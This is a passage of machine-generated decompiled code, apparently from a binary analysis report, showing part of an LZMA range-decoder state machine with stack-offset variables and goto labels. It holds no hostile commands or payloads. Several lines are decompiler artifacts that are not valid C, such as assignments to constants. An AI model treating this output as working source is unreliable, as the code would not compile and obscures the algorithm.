                                                                                                                      							__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                      							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      							if( *(__ebp - 0x38) >= 4) {
                                                                                                                      								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                      								if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                      									_t98 = __ebp - 0x38;
                                                                                                                      									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                      									__eflags =  *_t98;
                                                                                                                      								} else {
                                                                                                                      									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								 *(__ebp - 0x38) = 0;
                                                                                                                      							}
                                                                                                                      							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                      							if( *(__ebp - 0x34) == __edx) {
                                                                                                                      								__ebx = 0;
                                                                                                                      								__ebx = 1;
                                                                                                                      								goto L61;
                                                                                                                      							} else {
                                                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      									__eflags = __eax;
                                                                                                                      								}
                                                                                                                      								__ecx =  *(__ebp - 8);
                                                                                                                      								__ebx = 0;
                                                                                                                      								__ebx = 1;
                                                                                                                      								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      								goto L41;
                                                                                                                      							}
                                                                                                                      						case 7:
                                                                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      								__eax =  *(__ebp - 0x28);
                                                                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      								__eax = 0;
                                                                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      								__al = __al & 0x000000fd;
                                                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                      								__eflags = __eax;
                                                                                                                      								 *(__ebp - 0x58) = __eax;
                                                                                                                      								goto L69;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 4);
                                                                                                                      							__ecx =  *(__ebp - 0x38);
                                                                                                                      							 *(__ebp - 0x84) = 8;
                                                                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                      							goto L132;
                                                                                                                      						case 8:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                      							} else {
                                                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                                                      								__ecx =  *(__ebp - 4);
                                                                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                      								 *(__ebp - 0x84) = 9;
                                                                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                      							}
                                                                                                                      							goto L132;
                                                                                                                      						case 9:
                                                                                                                      							goto L0;
                                                                                                                      						case 0xa:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                      								goto L132;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 0x28);
                                                                                                                      							goto L88;
                                                                                                                      						case 0xb:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								__ecx =  *(__ebp - 0x24);
                                                                                                                      								__eax =  *(__ebp - 0x20);
                                                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      							} else {
                                                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x28);
                                                                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      							L88:
                                                                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      							goto L89;
                                                                                                                      						case 0xc:
                                                                                                                      							L99:
                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							_t334 = __ebp - 0x70;
                                                                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                      							__eflags =  *_t334;
                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							__eax =  *(__ebp - 0x2c);
                                                                                                                      							goto L101;
                                                                                                                      						case 0xd:
                                                                                                                      							L37:
                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                      								 *(__ebp - 0x88) = 0xd;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							_t122 = __ebp - 0x70;
                                                                                                                      							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                      							__eflags =  *_t122;
                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							L39:
                                                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                                                      							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                      								goto L48;
                                                                                                                      							}
                                                                                                                      							__eflags = __ebx - 0x100;
                                                                                                                      							if(__ebx >= 0x100) {
                                                                                                                      								goto L54;
                                                                                                                      							}
                                                                                                                      							L41:
                                                                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                      							 *(__ebp - 0x48) = __eax;
                                                                                                                      							__eax = __eax + 1;
                                                                                                                      							__eax = __eax << 8;
                                                                                                                      							__eax = __eax + __ebx;
                                                                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      							__ax =  *__esi;
                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      								__cx = __ax;
                                                                                                                      								 *(__ebp - 0x40) = 1;
                                                                                                                      								__cx = __ax >> 5;
                                                                                                                      								__eflags = __eax;
                                                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                                                      								 *__esi = __ax;
                                                                                                                      							} else {
                                                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                      								0x800 = 0x800 - __edx;
                                                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                      								 *__esi = __cx;
                                                                                                                      							}
                                                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      								goto L39;
                                                                                                                      							} else {
                                                                                                                      								goto L37;
                                                                                                                      							}
                                                                                                                      						case 0xe:
                                                                                                                      							L46:
                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                      								 *(__ebp - 0x88) = 0xe;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							_t156 = __ebp - 0x70;
                                                                                                                      							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                      							__eflags =  *_t156;
                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							while(1) {
                                                                                                                      								L48:
                                                                                                                      								__eflags = __ebx - 0x100;
                                                                                                                      								if(__ebx >= 0x100) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                                                      								__edx = __ebx + __ebx;
                                                                                                                      								__ecx =  *(__ebp - 0x10);
                                                                                                                      								__esi = __edx + __eax;
                                                                                                                      								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      								__ax =  *__esi;
                                                                                                                      								 *(__ebp - 0x54) = __esi;
                                                                                                                      								__edi = __ax & 0x0000ffff;
                                                                                                                      								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      								if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      									__cx = __ax;
                                                                                                                      									__ebx = __edx + 1;
                                                                                                                      									__cx = __ax >> 5;
                                                                                                                      									__eflags = __eax;
                                                                                                                      									 *__esi = __ax;
                                                                                                                      								} else {
                                                                                                                      									 *(__ebp - 0x10) = __ecx;
                                                                                                                      									0x800 = 0x800 - __edi;
                                                                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      									__ebx = __ebx + __ebx;
                                                                                                                      									 *__esi = __cx;
                                                                                                                      								}
                                                                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									goto L46;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L54:
                                                                                                                      							_t173 = __ebp - 0x34;
                                                                                                                      							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                      							__eflags =  *_t173;
                                                                                                                      							goto L55;
                                                                                                                      						case 0xf:
                                                                                                                      							L58:
                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                      								 *(__ebp - 0x88) = 0xf;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							_t203 = __ebp - 0x70;
                                                                                                                      							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                      							__eflags =  *_t203;
                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							L60:
                                                                                                                      							__eflags = __ebx - 0x100;
                                                                                                                      							if(__ebx >= 0x100) {
                                                                                                                      								L55:
                                                                                                                      								__al =  *(__ebp - 0x44);
                                                                                                                      								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                      								goto L56;
                                                                                                                      							}
                                                                                                                      							L61:
                                                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                                                      							__edx = __ebx + __ebx;
                                                                                                                      							__ecx =  *(__ebp - 0x10);
                                                                                                                      							__esi = __edx + __eax;
                                                                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      							__ax =  *__esi;
                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      								__cx = __ax;
                                                                                                                      								__ebx = __edx + 1;
                                                                                                                      								__cx = __ax >> 5;
                                                                                                                      								__eflags = __eax;
                                                                                                                      								 *__esi = __ax;
                                                                                                                      							} else {
                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                      								 *__esi = __cx;
                                                                                                                      							}
                                                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      								goto L60;
                                                                                                                      							} else {
                                                                                                                      								goto L58;
                                                                                                                      							}
                                                                                                                      						case 0x10:
                                                                                                                      							L109:
                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							_t365 = __ebp - 0x70;
                                                                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                      							__eflags =  *_t365;
                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							goto L111;
                                                                                                                      						case 0x11:
                                                                                                                      							goto L69;
                                                                                                                      						case 0x12:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                      								goto L132;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      							__eflags = __eax;
                                                                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                      							goto L130;
                                                                                                                      						case 0x13:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								_t469 = __ebp - 0x58;
                                                                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                      								__eflags =  *_t469;
                                                                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                                                                      								 *(__ebp - 0x40) = 8;
                                                                                                                      								L144:
                                                                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                                                                      								goto L145;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      							 *(__ebp - 0x30) = 8;
                                                                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                      							L130:
                                                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                                                      							 *(__ebp - 0x40) = 3;
                                                                                                                      							goto L144;
                                                                                                                      						case 0x14:
                                                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                      							__eax =  *(__ebp - 0x80);
                                                                                                                      							goto L140;
                                                                                                                      						case 0x15:
                                                                                                                      							__eax = 0;
                                                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      							__al = __al & 0x000000fd;
                                                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      							goto L120;
                                                                                                                      						case 0x16:
                                                                                                                      							__eax =  *(__ebp - 0x30);
                                                                                                                      							__eflags = __eax - 4;
                                                                                                                      							if(__eax >= 4) {
                                                                                                                      								_push(3);
                                                                                                                      								_pop(__eax);
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 4);
                                                                                                                      							 *(__ebp - 0x40) = 6;
                                                                                                                      							__eax = __eax << 7;
                                                                                                                      							 *(__ebp - 0x7c) = 0x19;
                                                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                                                      							goto L145;
                                                                                                                      						case 0x17:
                                                                                                                      							L145:
                                                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                                                      							 *(__ebp - 0x50) = 1;
                                                                                                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                      							goto L149;
                                                                                                                      						case 0x18:
                                                                                                                      							L146:
                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                      								 *(__ebp - 0x88) = 0x18;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							_t484 = __ebp - 0x70;
                                                                                                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                      							__eflags =  *_t484;
                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							L148:
                                                                                                                      							_t487 = __ebp - 0x48;
                                                                                                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                      							__eflags =  *_t487;
                                                                                                                      							L149:
                                                                                                                      							__eflags =  *(__ebp - 0x48);
                                                                                                                      							if( *(__ebp - 0x48) <= 0) {
                                                                                                                      								__ecx =  *(__ebp - 0x40);
                                                                                                                      								__ebx =  *(__ebp - 0x50);
                                                                                                                      								0 = 1;
                                                                                                                      								__eax = 1 << __cl;
                                                                                                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                      								__eax =  *(__ebp - 0x7c);
                                                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                                                      								goto L140;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 0x50);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                                                      							__esi = __edx + __eax;
                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                      							__ax =  *__esi;
                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      								__cx = __ax;
                                                                                                                      								__cx = __ax >> 5;
                                                                                                                      								__eax = __eax - __ecx;
                                                                                                                      								__edx = __edx + 1;
                                                                                                                      								__eflags = __edx;
                                                                                                                      								 *__esi = __ax;
                                                                                                                      								 *(__ebp - 0x50) = __edx;
                                                                                                                      							} else {
                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                      								 *__esi = __cx;
                                                                                                                      							}
                                                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      								goto L148;
                                                                                                                      							} else {
                                                                                                                      								goto L146;
                                                                                                                      							}
                                                                                                                      						case 0x19:
                                                                                                                      							__eflags = __ebx - 4;
                                                                                                                      							if(__ebx < 4) {
                                                                                                                      								 *(__ebp - 0x2c) = __ebx;
                                                                                                                      								L119:
                                                                                                                      								_t393 = __ebp - 0x2c;
                                                                                                                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                      								__eflags =  *_t393;
                                                                                                                      								L120:
                                                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                                                      								__eflags = __eax;
                                                                                                                      								if(__eax == 0) {
                                                                                                                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                      									goto L170;
                                                                                                                      								}
                                                                                                                      								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                      								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                      									goto L171;
                                                                                                                      								}
                                                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                      								__eax =  *(__ebp - 0x30);
                                                                                                                      								_t400 = __ebp - 0x60;
                                                                                                                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                      								__eflags =  *_t400;
                                                                                                                      								goto L123;
                                                                                                                      							}
                                                                                                                      							__ecx = __ebx;
                                                                                                                      							__eax = __ebx;
                                                                                                                      							__ecx = __ebx >> 1;
                                                                                                                      							__eax = __ebx & 0x00000001;
                                                                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                                                                      							__al = __al | 0x00000002;
                                                                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                      							__eflags = __ebx - 0xe;
                                                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                                                      							if(__ebx >= 0xe) {
                                                                                                                      								__ebx = 0;
                                                                                                                      								 *(__ebp - 0x48) = __ecx;
                                                                                                                      								L102:
                                                                                                                      								__eflags =  *(__ebp - 0x48);
                                                                                                                      								if( *(__ebp - 0x48) <= 0) {
                                                                                                                      									__eax = __eax + __ebx;
                                                                                                                      									 *(__ebp - 0x40) = 4;
                                                                                                                      									 *(__ebp - 0x2c) = __eax;
                                                                                                                      									__eax =  *(__ebp - 4);
                                                                                                                      									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                      									__eflags = __eax;
                                                                                                                      									L108:
                                                                                                                      									__ebx = 0;
                                                                                                                      									 *(__ebp - 0x58) = __eax;
                                                                                                                      									 *(__ebp - 0x50) = 1;
                                                                                                                      									 *(__ebp - 0x44) = 0;
                                                                                                                      									 *(__ebp - 0x48) = 0;
                                                                                                                      									L112:
                                                                                                                      									__eax =  *(__ebp - 0x40);
                                                                                                                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                      										_t391 = __ebp - 0x2c;
                                                                                                                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                      										__eflags =  *_t391;
                                                                                                                      										goto L119;
                                                                                                                      									}
                                                                                                                      									__eax =  *(__ebp - 0x50);
                                                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                      									__eax =  *(__ebp - 0x58);
                                                                                                                      									__esi = __edi + __eax;
                                                                                                                      									 *(__ebp - 0x54) = __esi;
                                                                                                                      									__ax =  *__esi;
                                                                                                                      									__ecx = __ax & 0x0000ffff;
                                                                                                                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                      									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                      									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                      										__ecx = 0;
                                                                                                                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                      										__ecx = 1;
                                                                                                                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                      										__ebx = 1;
                                                                                                                      										__ecx =  *(__ebp - 0x48);
                                                                                                                      										__ebx = 1 << __cl;
                                                                                                                      										__ecx = 1 << __cl;
                                                                                                                      										__ebx =  *(__ebp - 0x44);
                                                                                                                      										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                      										__cx = __ax;
                                                                                                                      										__cx = __ax >> 5;
                                                                                                                      										__eax = __eax - __ecx;
